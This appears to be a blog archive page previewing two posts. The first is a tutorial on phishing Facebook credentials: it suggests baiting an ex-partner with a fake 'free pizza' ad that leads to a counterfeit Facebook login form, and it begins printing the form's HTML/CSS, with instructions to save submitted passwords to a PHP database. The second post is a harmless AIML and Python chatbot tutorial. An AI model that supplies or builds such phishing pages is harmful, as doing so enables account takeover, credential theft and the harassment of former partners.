Skip to main content

Posts

Showing posts from 2018

Lets hack the freaking facebook

Hack i mean peak ....but i can still get yours ex username and password .... what else you need ? for now ? Hackers way in .. thats how facebook gets most of the employees to make this work lets make a Trojan add like free pizza and your ex clicked it and then it redirected to a custom form just like a facebook login form (login with facebook) and your idiot ex fill up the form boom you got her user name and password win win let me put the code that you could you to make that login page and store the data onto a database hope you guys know how to deal with php and its data base connection a bit... soo im gonna put the form code here and you can use a data base to connect it and use the post data your convince and my ease <html> <head> <style> .login-form-wrap {   background: #5170ad;   background: -moz-radial-gradient(center, ellipse cover, #5170ad 0%, #355493 100%);   background: -webkit-gradient(radial, center center, 0px,

Build Your On Virtual Assistant with AIML And Python

i know its been a while last i post something here.... i have your back , i got something way more interesting ...you read the title :D The things we are gonna need for this ride linux based system AIML PYTHON XML in short AIML is a form of XML that defines rules for matching patterns and determining responses. so every response should be written here.... dont worry i found a bunch of them on internet and i will provide And since we are gonna work with python we need aiml in python so enter this on terminal pip install aiml lets go to the code then   starting with XML <aiml version = "1.0.1" encoding = "UTF-8" >        <category>                <pattern> LOAD AIML B </pattern>         <template>             <learn> *.aiml </learn>         </template>             </category> </aiml>     save its as k.xml note:- see i put <learn> *.aiml </le